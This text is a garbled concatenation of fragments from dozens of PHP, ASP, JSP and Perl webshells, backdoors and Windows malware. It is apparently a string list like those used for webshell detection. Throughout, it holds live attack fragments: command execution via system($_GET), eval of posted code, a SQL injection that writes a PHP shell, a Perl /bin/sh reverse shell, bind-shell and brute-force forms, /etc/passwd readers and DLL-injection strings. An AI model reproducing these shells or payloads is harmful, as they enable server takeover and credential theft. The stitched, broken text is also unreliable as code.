\"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == 